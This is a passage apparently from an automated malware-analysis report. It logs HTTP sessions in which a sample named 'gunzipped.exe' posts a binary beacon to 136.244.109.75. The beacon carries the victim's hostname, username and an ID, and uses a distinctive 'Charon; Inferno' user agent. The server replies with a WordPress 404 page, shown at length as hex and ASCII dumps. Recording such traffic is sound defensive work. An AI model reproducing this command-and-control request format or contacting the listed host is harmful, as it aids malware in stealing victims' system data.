2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:59.276508093 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:59.276546955 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:59.276582003 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:59.276618958 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:59.276654959 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:59.276695013 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:59.276731968 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:59.276768923 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:59.276814938 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49757	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:59.618243933 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:59.826419115 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:00.829150915 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:59 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:00.829216003 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:00.829308987 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:00.829346895 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:00.829386950 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:00.829425097 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:00.829463959 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:00.829507113 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:00.829547882 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:00.829591990 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49758	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:01.176692009 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:01.380992889 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:02.314438105 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:01 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:02.314501047 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:02.314542055 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
